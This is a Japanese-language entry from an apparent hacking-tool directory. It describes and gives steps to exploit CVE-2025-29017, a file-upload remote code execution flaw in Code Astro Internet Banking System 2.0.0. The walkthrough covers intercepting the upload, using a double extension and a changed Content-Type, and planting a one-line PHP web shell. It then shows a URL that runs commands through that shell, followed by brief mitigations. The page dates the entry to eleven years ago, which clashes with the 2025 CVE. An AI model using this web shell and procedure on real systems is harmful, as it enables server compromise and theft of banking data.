Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-29017 | Kitploit
ツール/GitHubGitHub/b1tm4r/cve-2025-29017
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubb1tm4r/cve-2025-29017

CVE-2025-29017

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-29017 - Internet Banking System 2.0.0 プロフィール画像アップロードによるリモートコード実行

説明

Code Astro Internet Banking System 2.0.0 には、pages_view_client.php 内の profile_pic パラメータにおける不適切なファイルアップロード検証により、リモートコード実行 (RCE) の脆弱性が存在します。攻撃者はアップロードリクエストを変更することでセキュリティチェックをバイパスし、任意のコード実行が可能になります。

影響を受けるコンポーネント

  • pages_view_client.php 内の profile_pic パラメータ
  • アップロード機能により悪意のある PHP ファイルの実行が可能

悪用手順

  1. ユーザープロフィール設定に移動し、新しいプロフィール画像を選択します。



  1. Burp Suite などのツールを使用してプロフィール画像アップロードリクエストを傍受します。


  1. ファイルを二重拡張子 (.jpeg.php) に変更し、Content-Type ヘッダーを application/x-php に変更して、悪意のある PHP コードを追加します:
root@kitploit:~
<?php system($_GET['cmd']); ?>



  1. ファイルが /admin/dist/img/ にアップロードされているか確認できます:
root@kitploit:~
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt


影響

  • サーバー完全侵害
  • データ窃取
  • 権限昇格

緩和策

  • ファイルアップロードを画像形式のみに制限し、MIME タイプを検証する。
  • ファイル名をサニタイズし、実行可能コードを含むファイルをブロックする。
  • アップロードされたファイルを Web ルートの外に保存する。

参照

  • OWASP ファイルアップロードセキュリティ
ツールをダウンロード